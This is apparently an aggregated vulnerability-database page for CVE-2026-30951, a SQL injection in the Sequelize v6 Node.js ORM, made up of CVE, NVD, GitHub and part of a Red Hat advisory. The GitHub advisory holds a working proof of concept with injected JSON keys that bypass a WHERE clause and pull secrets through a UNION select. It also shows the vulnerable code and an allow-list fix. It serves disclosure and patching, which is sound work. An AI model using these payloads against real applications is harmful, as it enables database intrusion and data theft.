Action not permitted
Modal body text goes here.
Modal Title
Modal Body
CVE-2026-30951 (GCVE-0-2026-30951)
Vulnerability from cvelistv5 – Published: 2026-03-10 20:22 – Updated: 2026-03-11 14:40
VLAI
EPSS
Title
Sequelize v6 Vulnerable to SQL Injection via JSON Column Cast Type
Summary
Sequelize is a Node.js ORM tool. Prior to 6.37.8, there is SQL injection via unescaped cast type in JSON/JSONB where clause processing. The _traverseJSON() function splits JSON path keys on :: to extract a cast type, which is interpolated raw into CAST(... AS <type>) SQL. An attacker who controls JSON object keys can inject arbitrary SQL and exfiltrate data from any table. This vulnerability is fixed in 6.37.8.
Severity
7.5 (High)
CWE
- CWE-89 - Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
Assigner
References
1 reference
| URL | Tags |
|---|---|
| https://github.com/sequelize/sequelize/security/a… | x_refsource_CONFIRM |
Impacted products
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2026-30951",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-03-11T14:40:09.586637Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-03-11T14:40:34.034Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "sequelize",
"vendor": "sequelize",
"versions": [
{
"status": "affected",
"version": "\u003e= 6.0.0-beta.1, \u003c 6.37.8"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Sequelize is a Node.js ORM tool. Prior to 6.37.8, there is SQL injection via unescaped cast type in JSON/JSONB where clause processing. The _traverseJSON() function splits JSON path keys on :: to extract a cast type, which is interpolated raw into CAST(... AS \u003ctype\u003e) SQL. An attacker who controls JSON object keys can inject arbitrary SQL and exfiltrate data from any table. This vulnerability is fixed in 6.37.8."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-89",
"description": "CWE-89: Improper Neutralization of Special Elements used in an SQL Command (\u0027SQL Injection\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-03-11T00:19:12.793Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/sequelize/sequelize/security/advisories/GHSA-6457-6jrx-69cr",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/sequelize/sequelize/security/advisories/GHSA-6457-6jrx-69cr"
}
],
"source": {
"advisory": "GHSA-6457-6jrx-69cr",
"discovery": "UNKNOWN"
},
"title": "Sequelize v6 Vulnerable to SQL Injection via JSON Column Cast Type"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2026-30951",
"datePublished": "2026-03-10T20:22:46.150Z",
"dateReserved": "2026-03-07T17:34:39.980Z",
"dateUpdated": "2026-03-11T14:40:34.034Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2",
"vulnerability-lookup:meta": {
"epss": {
"cve": "CVE-2026-30951",
"date": "2026-05-25",
"epss": "0.0002",
"percentile": "0.05891"
},
"nvd": "{\"cve\":{\"id\":\"CVE-2026-30951\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-03-10T21:16:48.030\",\"lastModified\":\"2026-03-18T19:16:04.997\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Sequelize is a Node.js ORM tool. Prior to 6.37.8, there is SQL injection via unescaped cast type in JSON/JSONB where clause processing. The _traverseJSON() function splits JSON path keys on :: to extract a cast type, which is interpolated raw into CAST(... AS \u003ctype\u003e) SQL. An attacker who controls JSON object keys can inject arbitrary SQL and exfiltrate data from any table. This vulnerability is fixed in 6.37.8.\"},{\"lang\":\"es\",\"value\":\"Sequelize es una herramienta ORM para Node.js. Antes de la 6.37.8, existe una inyecci\u00f3n SQL mediante un tipo de conversi\u00f3n (cast) sin escapar en el procesamiento de cl\u00e1usulas WHERE de JSON/JSONB. La funci\u00f3n _traverseJSON() divide las claves de ruta JSON en :: para extraer un tipo de conversi\u00f3n (cast), el cual se interpola directamente en el SQL CAST(... AS ). Un atacante que controla las claves de objetos JSON puede inyectar SQL arbitrario y exfiltrar datos de cualquier tabla. Esta vulnerabilidad est\u00e1 corregida en la versi\u00f3n 6.37.8.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\",\"baseScore\":7.5,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"NONE\",\"availabilityImpact\":\"NONE\"},\"exploitabilityScore\":3.9,\"impactScore\":3.6},{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\",\"baseScore\":7.5,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"NONE\",\"availabilityImpact\":\"NONE\"},\"exploitabilityScore\":3.9,\"impactScore\":3.6}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-89\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:sequelizejs:sequelize:*:*:*:*:*:node.js:*:*\",\"versionEndExcluding\":\"6.37.8\",\"matchCriteriaId\":\"AD0E1D98-A552-4E72-B530-62CC7B1B21B8\"}]}]}],\"references\":[{\"url\":\"https://github.com/sequelize/sequelize/security/advisories/GHSA-6457-6jrx-69cr\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Mitigation\",\"Vendor Advisory\"]}]}}",
"vulnrichment": {
"containers": "{\"cna\": {\"title\": \"SQL Injection via JSON Column Cast Type in Sequelize v6\", \"source\": {\"advisory\": \"GHSA-6457-6jrx-69cr\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 7.5, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\", \"integrityImpact\": \"NONE\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"NONE\", \"privilegesRequired\": \"NONE\", \"confidentialityImpact\": \"HIGH\"}}], \"affected\": [{\"vendor\": \"sequelize\", \"product\": \"sequelize\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 6.37.8\"}]}], \"references\": [{\"url\": \"https://github.com/sequelize/sequelize/security/advisories/GHSA-6457-6jrx-69cr\", \"name\": \"https://github.com/sequelize/sequelize/security/advisories/GHSA-6457-6jrx-69cr\", \"tags\": [\"x_refsource_CONFIRM\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"Sequelize is a Node.js ORM tool. Prior to 6.37.8, there is SQL injection via unescaped cast type in JSON/JSONB where clause processing. The _traverseJSON() function splits JSON path keys on :: to extract a cast type, which is interpolated raw into CAST(... AS \u003ctype\u003e) SQL. An attacker who controls JSON object keys can inject arbitrary SQL and exfiltrate data from any table. This vulnerability is fixed in 6.37.8.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-89\", \"description\": \"CWE-89: Improper Neutralization of Special Elements used in an SQL Command (\u0027SQL Injection\u0027)\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-03-10T20:22:46.150Z\"}}, \"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-30951\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"none\"}, {\"Automatable\": \"yes\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-03-11T14:40:09.586637Z\"}}}], \"providerMetadata\": {\"shortName\": \"CISA-ADP\", \"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"dateUpdated\": \"2026-03-11T14:40:29.642Z\"}}]}",
"cveMetadata": "{\"cveId\": \"CVE-2026-30951\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-03-10T20:22:46.150Z\", \"dateReserved\": \"2026-03-07T17:34:39.980Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-03-10T20:22:46.150Z\", \"assignerShortName\": \"GitHub_M\"}",
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
}
}
FKIE_CVE-2026-30951
Vulnerability from fkie_nvd - Published: 2026-03-10 21:16 - Updated: 2026-03-18 19:16
Severity
7.5 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
7.5 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
7.5 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Summary
Sequelize is a Node.js ORM tool. Prior to 6.37.8, there is SQL injection via unescaped cast type in JSON/JSONB where clause processing. The _traverseJSON() function splits JSON path keys on :: to extract a cast type, which is interpolated raw into CAST(... AS <type>) SQL. An attacker who controls JSON object keys can inject arbitrary SQL and exfiltrate data from any table. This vulnerability is fixed in 6.37.8.
References
| URL | Tags | ||
|---|---|---|---|
| security-advisories@github.com | https://github.com/sequelize/sequelize/security/advisories/GHSA-6457-6jrx-69cr | Exploit, Mitigation, Vendor Advisory |
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| sequelizejs | sequelize | * |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:sequelizejs:sequelize:*:*:*:*:*:node.js:*:*",
"matchCriteriaId": "AD0E1D98-A552-4E72-B530-62CC7B1B21B8",
"versionEndExcluding": "6.37.8",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Sequelize is a Node.js ORM tool. Prior to 6.37.8, there is SQL injection via unescaped cast type in JSON/JSONB where clause processing. The _traverseJSON() function splits JSON path keys on :: to extract a cast type, which is interpolated raw into CAST(... AS \u003ctype\u003e) SQL. An attacker who controls JSON object keys can inject arbitrary SQL and exfiltrate data from any table. This vulnerability is fixed in 6.37.8."
},
{
"lang": "es",
"value": "Sequelize es una herramienta ORM para Node.js. Antes de la 6.37.8, existe una inyecci\u00f3n SQL mediante un tipo de conversi\u00f3n (cast) sin escapar en el procesamiento de cl\u00e1usulas WHERE de JSON/JSONB. La funci\u00f3n _traverseJSON() divide las claves de ruta JSON en :: para extraer un tipo de conversi\u00f3n (cast), el cual se interpola directamente en el SQL CAST(... AS ). Un atacante que controla las claves de objetos JSON puede inyectar SQL arbitrario y exfiltrar datos de cualquier tabla. Esta vulnerabilidad est\u00e1 corregida en la versi\u00f3n 6.37.8."
}
],
"id": "CVE-2026-30951",
"lastModified": "2026-03-18T19:16:04.997",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "security-advisories@github.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2026-03-10T21:16:48.030",
"references": [
{
"source": "security-advisories@github.com",
"tags": [
"Exploit",
"Mitigation",
"Vendor Advisory"
],
"url": "https://github.com/sequelize/sequelize/security/advisories/GHSA-6457-6jrx-69cr"
}
],
"sourceIdentifier": "security-advisories@github.com",
"vulnStatus": "Analyzed",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-89"
}
],
"source": "security-advisories@github.com",
"type": "Secondary"
}
]
}
GHSA-6457-6JRX-69CR
Vulnerability from github – Published: 2026-03-11 00:18 – Updated: 2026-03-11 00:18
VLAI
Summary
Sequelize v6 Vulnerable to SQL Injection via JSON Column Cast Type
Details
Summary
SQL injection via unescaped cast type in JSON/JSONB where clause processing. The _traverseJSON() function splits JSON path keys on :: to extract a cast type, which is interpolated raw into CAST(... AS <type>) SQL. An attacker who controls JSON object keys can inject arbitrary SQL and exfiltrate data from any table.
Affected: v6.x through 6.37.7. v7 (@sequelize/core) is not affected.
Details
In src/dialects/abstract/query-generator.js, _traverseJSON() extracts a cast type from :: in JSON keys without validation:
// line 1892
_traverseJSON(items, baseKey, prop, item, path) {
let cast;
if (path[path.length - 1].includes("::")) {
const tmp = path[path.length - 1].split("::");
cast = tmp[1]; // attacker-controlled, no escaping
path[path.length - 1] = tmp[0];
}
// ...
items.push(this.whereItemQuery(this._castKey(pathKey, item, cast), { [Op.eq]: item }));
}
_castKey() (line 1925) passes it to Utils.Cast, and handleSequelizeMethod() (line 1692) interpolates it directly:
return `CAST(${result} AS ${smth.type.toUpperCase()})`;
JSON path values are escaped via this.escape() in jsonPathExtractionQuery(), but the cast type is not.
Suggested fix — whitelist known SQL data types:
const ALLOWED_CAST_TYPES = new Set([
'integer', 'text', 'real', 'numeric', 'boolean', 'date',
'timestamp', 'timestamptz', 'json', 'jsonb', 'float',
'double precision', 'bigint', 'smallint', 'varchar', 'char',
]);
if (cast && !ALLOWED_CAST_TYPES.has(cast.toLowerCase())) {
throw new Error(`Invalid cast type: ${cast}`);
}
PoC
npm install sequelize@6.37.7 sqlite3
const { Sequelize, DataTypes } = require('sequelize');
async function main() {
const sequelize = new Sequelize('sqlite::memory:', { logging: false });
const User = sequelize.define('User', {
username: DataTypes.STRING,
metadata: DataTypes.JSON,
});
const Secret = sequelize.define('Secret', {
key: DataTypes.STRING,
value: DataTypes.STRING,
});
await sequelize.sync({ force: true });
await User.bulkCreate([
{ username: 'alice', metadata: { role: 'admin', level: 10 } },
{ username: 'bob', metadata: { role: 'user', level: 5 } },
{ username: 'charlie', metadata: { role: 'user', level: 1 } },
]);
await Secret.bulkCreate([
{ key: 'api_key', value: 'sk-secret-12345' },
{ key: 'db_password', value: 'super_secret_password' },
]);
// TEST 1: WHERE clause bypass
const r1 = await User.findAll({
where: { metadata: { 'role::text) or 1=1--': 'anything' } },
logging: (sql) => console.log('SQL:', sql),
});
console.log('OR 1=1:', r1.map(u => u.username));
// Returns ALL rows: ['alice', 'bob', 'charlie']
// TEST 2: UNION-based cross-table exfiltration
const r2 = await User.findAll({
where: {
metadata: {
'role::text) and 0 union select id,key,value,null,null from Secrets--': 'x'
}
},
raw: true,
logging: (sql) => console.log('SQL:', sql),
});
console.log('UNION:', r2.map(r => `${r.username}=${r.metadata}`));
// Returns: api_key=sk-secret-12345, db_password=super_secret_password
}
main().catch(console.error);
Output:
SQL: SELECT `id`, `username`, `metadata`, `createdAt`, `updatedAt`
FROM `Users` AS `User`
WHERE CAST(json_extract(`User`.`metadata`,'$.role') AS TEXT) OR 1=1--) = 'anything';
OR 1=1: [ 'alice', 'bob', 'charlie' ]
SQL: SELECT `id`, `username`, `metadata`, `createdAt`, `updatedAt`
FROM `Users` AS `User`
WHERE CAST(json_extract(`User`.`metadata`,'$.role') AS TEXT) AND 0
UNION SELECT ID,KEY,VALUE,NULL,NULL FROM SECRETS--) = 'x';
UNION: [ 'api_key=sk-secret-12345', 'db_password=super_secret_password' ]
Impact
SQL Injection (CWE-89) — Any application that passes user-controlled objects as where clause values for JSON/JSONB columns is vulnerable. An attacker can exfiltrate data from any table in the database via UNION-based or boolean-blind injection. All dialects with JSON support are affected (SQLite, PostgreSQL, MySQL, MariaDB).
A common vulnerable pattern:
app.post('/api/users/search', async (req, res) => {
const users = await User.findAll({
where: { metadata: req.body.filter } // user controls JSON object keys
});
res.json(users);
});
Severity
7.5 (High)
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 6.37.7"
},
"package": {
"ecosystem": "npm",
"name": "sequelize"
},
"ranges": [
{
"events": [
{
"introduced": "6.0.0-beta.1"
},
{
"fixed": "6.37.8"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-30951"
],
"database_specific": {
"cwe_ids": [
"CWE-89"
],
"github_reviewed": true,
"github_reviewed_at": "2026-03-11T00:18:48Z",
"nvd_published_at": "2026-03-10T21:16:48Z",
"severity": "HIGH"
},
"details": "### Summary\n\nSQL injection via unescaped cast type in JSON/JSONB `where` clause processing. The `_traverseJSON()` function splits JSON path keys on `::` to extract a cast type, which is interpolated raw into `CAST(... AS \u003ctype\u003e)` SQL. An attacker who controls JSON object keys can inject arbitrary SQL and exfiltrate data from any table.\n\nAffected: v6.x through 6.37.7. v7 (`@sequelize/core`) is not affected.\n\n### Details\n\nIn `src/dialects/abstract/query-generator.js`, `_traverseJSON()` extracts a cast type from `::` in JSON keys without validation:\n\n```javascript\n// line 1892\n_traverseJSON(items, baseKey, prop, item, path) {\n let cast;\n if (path[path.length - 1].includes(\"::\")) {\n const tmp = path[path.length - 1].split(\"::\");\n cast = tmp[1]; // attacker-controlled, no escaping\n path[path.length - 1] = tmp[0];\n }\n // ...\n items.push(this.whereItemQuery(this._castKey(pathKey, item, cast), { [Op.eq]: item }));\n}\n```\n\n`_castKey()` (line 1925) passes it to `Utils.Cast`, and `handleSequelizeMethod()` (line 1692) interpolates it directly:\n\n```javascript\nreturn `CAST(${result} AS ${smth.type.toUpperCase()})`;\n```\n\nJSON path **values** are escaped via `this.escape()` in `jsonPathExtractionQuery()`, but the cast **type** is not.\n\n**Suggested fix** \u2014 whitelist known SQL data types:\n\n```javascript\nconst ALLOWED_CAST_TYPES = new Set([\n \u0027integer\u0027, \u0027text\u0027, \u0027real\u0027, \u0027numeric\u0027, \u0027boolean\u0027, \u0027date\u0027,\n \u0027timestamp\u0027, \u0027timestamptz\u0027, \u0027json\u0027, \u0027jsonb\u0027, \u0027float\u0027,\n \u0027double precision\u0027, \u0027bigint\u0027, \u0027smallint\u0027, \u0027varchar\u0027, \u0027char\u0027,\n]);\n\nif (cast \u0026\u0026 !ALLOWED_CAST_TYPES.has(cast.toLowerCase())) {\n throw new Error(`Invalid cast type: ${cast}`);\n}\n```\n\n### PoC\n\n`npm install sequelize@6.37.7 sqlite3`\n\n```javascript\nconst { Sequelize, DataTypes } = require(\u0027sequelize\u0027);\n\nasync function main() {\n const sequelize = new Sequelize(\u0027sqlite::memory:\u0027, { logging: false });\n\n const User = sequelize.define(\u0027User\u0027, {\n username: DataTypes.STRING,\n metadata: DataTypes.JSON,\n });\n\n const Secret = sequelize.define(\u0027Secret\u0027, {\n key: DataTypes.STRING,\n value: DataTypes.STRING,\n });\n\n await sequelize.sync({ force: true });\n\n await User.bulkCreate([\n { username: \u0027alice\u0027, metadata: { role: \u0027admin\u0027, level: 10 } },\n { username: \u0027bob\u0027, metadata: { role: \u0027user\u0027, level: 5 } },\n { username: \u0027charlie\u0027, metadata: { role: \u0027user\u0027, level: 1 } },\n ]);\n\n await Secret.bulkCreate([\n { key: \u0027api_key\u0027, value: \u0027sk-secret-12345\u0027 },\n { key: \u0027db_password\u0027, value: \u0027super_secret_password\u0027 },\n ]);\n\n // TEST 1: WHERE clause bypass\n const r1 = await User.findAll({\n where: { metadata: { \u0027role::text) or 1=1--\u0027: \u0027anything\u0027 } },\n logging: (sql) =\u003e console.log(\u0027SQL:\u0027, sql),\n });\n console.log(\u0027OR 1=1:\u0027, r1.map(u =\u003e u.username));\n // Returns ALL rows: [\u0027alice\u0027, \u0027bob\u0027, \u0027charlie\u0027]\n\n // TEST 2: UNION-based cross-table exfiltration\n const r2 = await User.findAll({\n where: {\n metadata: {\n \u0027role::text) and 0 union select id,key,value,null,null from Secrets--\u0027: \u0027x\u0027\n }\n },\n raw: true,\n logging: (sql) =\u003e console.log(\u0027SQL:\u0027, sql),\n });\n console.log(\u0027UNION:\u0027, r2.map(r =\u003e `${r.username}=${r.metadata}`));\n // Returns: api_key=sk-secret-12345, db_password=super_secret_password\n}\n\nmain().catch(console.error);\n```\n\n**Output:**\n\n```\nSQL: SELECT `id`, `username`, `metadata`, `createdAt`, `updatedAt`\n FROM `Users` AS `User`\n WHERE CAST(json_extract(`User`.`metadata`,\u0027$.role\u0027) AS TEXT) OR 1=1--) = \u0027anything\u0027;\nOR 1=1: [ \u0027alice\u0027, \u0027bob\u0027, \u0027charlie\u0027 ]\n\nSQL: SELECT `id`, `username`, `metadata`, `createdAt`, `updatedAt`\n FROM `Users` AS `User`\n WHERE CAST(json_extract(`User`.`metadata`,\u0027$.role\u0027) AS TEXT) AND 0\n UNION SELECT ID,KEY,VALUE,NULL,NULL FROM SECRETS--) = \u0027x\u0027;\nUNION: [ \u0027api_key=sk-secret-12345\u0027, \u0027db_password=super_secret_password\u0027 ]\n```\n\n### Impact\n\n**SQL Injection (CWE-89)** \u2014 Any application that passes user-controlled objects as `where` clause values for JSON/JSONB columns is vulnerable. An attacker can exfiltrate data from any table in the database via UNION-based or boolean-blind injection. All dialects with JSON support are affected (SQLite, PostgreSQL, MySQL, MariaDB).\n\nA common vulnerable pattern:\n\n```javascript\napp.post(\u0027/api/users/search\u0027, async (req, res) =\u003e {\n const users = await User.findAll({\n where: { metadata: req.body.filter } // user controls JSON object keys\n });\n res.json(users);\n});\n```",
"id": "GHSA-6457-6jrx-69cr",
"modified": "2026-03-11T00:18:48Z",
"published": "2026-03-11T00:18:48Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/sequelize/sequelize/security/advisories/GHSA-6457-6jrx-69cr"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-30951"
},
{
"type": "PACKAGE",
"url": "https://github.com/sequelize/sequelize"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
],
"summary": "Sequelize v6 Vulnerable to SQL Injection via JSON Column Cast Type"
}
RHSA-2026:8498
Vulnerability from csaf_redhat - Published: 2026-04-16 15:09 - Updated: 2026-05-22 08:51Summary
Red Hat Security Advisory: General availability of the satellite/iop-remediations-rhel9 container image
Severity
Important
Notes
Topic: A new satellite/iop-remediations-rhel9 container image is now generally available in the Red Hat container registry.
Details: Red Hat Lightspeed in Satellite analyzes system health and configuration by applying predefined rules to a small set of local data, such as installed packages, running services, and configuration settings. When you install Red Hat Lightspeed in Satellite locally, you can generate Red Hat Lightspeed recommendations without sending system data to Red Hat services.
Terms of Use: This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.
A flaw was found in lodash. The fix for CVE-2021-23337 added validation for the variable option in _.template but did not apply the same validation to options.imports key names. Both paths flow into the same Function() constructor sink. Additionally, _.template uses assignInWith to merge imports, which enumerates inherited properties via for..in. If Object.prototype has been polluted by any other vector, the polluted keys are copied into the imports object and passed to Function().
8.1 (High)
Affected products
Fixed
1 product
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Satellite 6.18:registry.redhat.io/satellite/iop-remediations-rhel9@sha256:94bfbcac75fca25a6babc06844a05703c5e745939c62288131f56e039877601c_amd64 | — |
Vendor Fix
fix
Workaround
|
Threats
Impact
Important
A flaw was found in Sequelize, a Node.js Object-Relational Mapper (ORM) tool. A remote attacker can exploit a SQL injection vulnerability by manipulating JSON object keys during JSON/JSONB where clause processing. This allows for the injection of arbitrary SQL commands due to the improper handling of cast types. The primary consequence is the potential for unauthorized data exfiltration from any database table.
7.5 (High)
Affected products
Fixed
1 product
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Satellite 6.18:registry.redhat.io/satellite/iop-remediations-rhel9@sha256:94bfbcac75fca25a6babc06844a05703c5e745939c62288131f56e039877601c_amd64 | — |
Vendor Fix
fix
Workaround
|
Threats
Impact
Important
References
21 references
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "A new satellite/iop-remediations-rhel9 container image is now generally available in the Red Hat container registry.",
"title": "Topic"
},
{
"category": "general",
"text": "Red Hat Lightspeed in Satellite analyzes system health and configuration by applying predefined rules to a small set of local data, such as installed packages, running services, and configuration settings. When you install Red Hat Lightspeed in Satellite locally, you can generate Red Hat Lightspeed recommendations without sending system data to Red Hat services. ",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2026:8498",
"url": "https://access.redhat.com/errata/RHSA-2026:8498"
},
{
"category": "external",
"summary": "https://access.redhat.com/documentation/en-us/red_hat_satellite/6.18/html/updating_red_hat_satellite/index",
"url": "https://access.redhat.com/documentation/en-us/red_hat_satellite/6.18/html/updating_red_hat_satellite/index"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-30951",
"url": "https://access.redhat.com/security/cve/CVE-2026-30951"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2026-4800",
"url": "https://access.redhat.com/security/cve/CVE-2026-4800"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/",
"url": "https://access.redhat.com/security/updates/classification/"
},
{
"category": "external",
"summary": "https://catalog.redhat.com/software/containers/search",
"url": "https://catalog.redhat.com/software/containers/search"
},
{
"category": "external",
"summary": "https://docs.redhat.com/en/documentation/red_hat_satellite/6.18/html/installing_satellite_server_in_a_connected_network_environment/performing-additional-configuration-on-server_satellite#installing-and-configuring-red-hat-lightspeed-in-satellite",
"url": "https://docs.redhat.com/en/documentation/red_hat_satellite/6.18/html/installing_satellite_server_in_a_connected_network_environment/performing-additional-configuration-on-server_satellite#installing-and-configuring-red-hat-lightspeed-in-satellite"
},
{
"category": "external",
"summary": "https://docs.redhat.com/en/documentation/red_hat_satellite/6.18/html/installing_satellite_server_in_a_disconnected_network_environment/performing-additional-configuration#installing-and-configuring-red-hat-lightspeed-in-satellite",
"url": "https://docs.redhat.com/en/documentation/red_hat_satellite/6.18/html/installing_satellite_server_in_a_disconnected_network_environment/performing-additional-configuration#installing-and-configuring-red-hat-lightspeed-in-satellite"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2026/rhsa-2026_8498.json"
}
],
"title": "Red Hat Security Advisory: General availability of the satellite/iop-remediations-rhel9 container image",
"tracking": {
"current_release_date": "2026-05-22T08:51:17+00:00",
"generator": {
"date": "2026-05-22T08:51:17+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "4.8.1"
}
},
"id": "RHSA-2026:8498",
"initial_release_date": "2026-04-16T15:09:56+00:00",
